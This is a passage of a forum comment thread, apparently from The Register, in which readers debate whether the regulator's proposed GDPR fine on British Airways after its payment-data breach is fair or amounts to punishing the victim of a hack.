    Why are we fining the organisation holding data for the fact someone stole that data? The following analogy may be over-simplified, however, if you report your car stolen, the police tend to try and find out who stole it, and go after them for punishment. They don't turn around and fine the victim of the theft, saying that they should have better protected the vehicle.

    I know this gets a bit murky with it being other people's personal data, however hear me out... if the data was stolen from adequately protected systems, why is it the data holder's (victim in this case) fault that data was stolen? They didn't steal it. They certainly didn't want it stolen.

    They obviously have some level of basic security deterrents in place, all companies do. But in IT security, they are exactly that - deterrents. They will not stop anyone who REALLY wants to get in from getting in. That's a data security pipe dream.

    Why are we not putting effort into identifying and punishing the perpetrators of the hack instead of the victims?

    Not to be sticking up for BA specifically here, but this has been on my mind since they came up with this whole fine companies for data breaches thing. I assumed it was meant to catch stupid fuck ups, like leaving sensitive USB sticks lying around, or laptops unlocked etc. Just seems a little backwards and gives hackers more freedoms than anything.

    1. DavCrav

      Re: Unpopular Opinion

      "The following analogy may be over-simplified, however, if you report your car stolen, the police tend to try and find out who stole it, and go after them for punishment. They don't turn around and fine the victim of the theft, saying that they should have better protected the vehicle."

      They didn't own the data, it was someone else's. If the 'we hold your possessions securely' storage company actually just lets anyone in and lets them take anything they want, they will be done as well.

      "They obviously have some level of basic security deterrents in place, all companies do. "

      Apparently, although I am not an expert in this, their safeguards were well below best practice, hence the fine.

    2. MrSeaneyC

      Re: Unpopular Opinion

      You would have a point, if the data was stolen from adequately protected systems. As it was, this is not the case. IMHO running unchecked 3rd party code on your payment pages is completely negligent. Personally I think the fine should be much bigger than this given BA’s unbelievably arrogant stance (“The details weren’t used for fraudulent transactions” - Err, yes they were, plenty of people who only used their card on BA having it cloned within the affected period) and the fact it will obviously be batted down through the process.

    3. Sandtitz Silver badge

      Re: Unpopular Opinion

      "if you report your car stolen, the police tend to try and find out who stole it, and go after them for punishment. They dont turn around and fine the victim of the theft,"

      The victim owned the car and was responsible to the owner - himself. You can't sue yourself. (not sure about USA...)

      "saying that they should have better protected the vehicle."

      Oh, most plods will state the obvious to the victim...

      "They obviously have some level of basic security deterrents in place, all companies do. But in IT security, they are exactly that - deterrents. They will not stop anyone who REALLY wants to get in from getting in. That's a data security pipe dream."

      So... since nothing can be secured 100%, why bother at all with security?

      The question here is whether there were reasonably good safeguards against data theft. The nature of theft has not been discussed but hopefully an inquiry into this will enlighten us whether BA had the equivalent of Fort Knox for customer information storage; if all data was stored in an unpatched XP in the cupboard, or something inbetween.

      If the safeguards were adequate, encryption everywhere, hashed passwords, everything PCI DSS compliant etc, the fines may be lowered or cancelled. They haven't been fined yet.

      "Why are we not putting effort into identifying and punishing the perpetrators of the hack instead of the victims?"

      Who says that no effort has been done to identify the perps? The problem with many digital heists is the lack of evidence if the perps have known how to hide their traces.

      1. Frau Blücher

        Re: Unpopular Opinion

        To continue the car example, there are two elements involved. One is liability in criminal law - that is only the responsibility of the car thief. The other would be civil liability. Again, that is the car thief's responsibility, but of course we know most thieves never pay for the cars they steal.

        Therefore of course, we usually insure our cars against theft. The insurer will pay the value for the stolen car or its damages, but only if the insured hasn't been negligent or sloppy. If you leave it unlocked with the keys in then you won't get covered. But leaving it in a dark alley in a dodgy part of town is usually not grounds to refuse payment (I think - depends on the policy I suppose - foreign travel to some countries is excluded).

        Taking this together, I agree with the original poster - this is like the police fining the car owner (or say the friend of the owner who was using the car) - I guess the question is, has the friend done the DP equivalent of leaving the keys in the ignition, or just parked it somewhere dodgy? I guess in the former case a fine is legitimate, BUT it still is (to me) a very blunt tool to set a liability.

        In theory there is already negligence law which could allow an individual person to sue a data holder for negligently letting it leak out. But the victim would have to show some kind of loss. The scale of these fines suggests this link is absent (360 quid per person involved) - weird to set it by reference to the global revenue. Maybe one victim lost nothing, and another had 1,000s of pounds run up on their card. Each person should get their respective sum lost.

  27. amanfromMars 1 Silver badge

    The Nitty Gritty on the Insane Virtualised Cost of Doing New Business with 0 0Day Protection Cover

    Is any realistic valid insurance cover available to all parties such as a British Airways to ensure information and intelligence breaches are not possible and preventable?

    Failing that facility being ready for immediate secure supply, are not breaches and leaks not normal courses of action and fully to be expected rather than bizarrely penalised with fantastic fiat fines?

    So who fronts and dons the Dick Turpin mask for such daylight highway robbery?

    1. cynic56
      Joke

      Re: The Nitty Gritty - title too long for The Register etc.

      You are a bad person! My brother almost lost his job for (innocently) using the phrase N*tty Gr*tty (see, I can't even bear to type the words because they are so racist )- honestly!

      1. Intractable Potsherd

        Re: The Nitty Gritty - title too long for The Register etc.

        I hadn't heard this gem before, so I've just done some research. There is absolutely no - repeat no - evidence that the term "nitty-gritty" is racist. This ridiculous farce needs to be killed as soon as possible.

  28. Phil Kingston

    180 million...

    .... would have bought a lot of pen testing.

    Heck, 18m would have probably done it.

  29. Frau Blücher

    Watching the GDPR actually get used makes me uncomfortable. Besides the mental and ongoing costs of compliance, the actual enforcement seems to be an affront to basic principles of justice. BA's argument is a fair one, what is the harm done here - how does that link to the penalty awarded? That is a starting point for damages awarded in normal civil claims in the common law world. And why does the regulator get to set the penalty? They act as rule maker (via guidance docs issued), prosecutor, and jury. Fine - this gets appealed to the proper courts, but usually this kind of right is granted only to police in fairly low level offences (e.g. speeding tickets). The scale of penalties creates vast power in a single regulator. And finally, it is essentially victim blaming - in most UK cases the data controller has been hacked, which is in fact a crime against them - imagine applying this logic to victims of sexual violence...

    The answer to all of this is that this is a European invention and this is how things go in civil law countries. Ok fine, but it doesn't sit well with the common law tradition. And as usual it seems to me the UK regulator enforces the "rights" rigorously and hands out swingeing fines, even against local UK companies (when the fines were in reality calibrated to hit FB, Google etc.) - whereas various continental counterparts get away with fairly limited fines, if they get fined at all.

  30. spold Silver badge

    747 payment settlement

    Looking forward to seeing the new 747 in "ICO Enforcement" livery
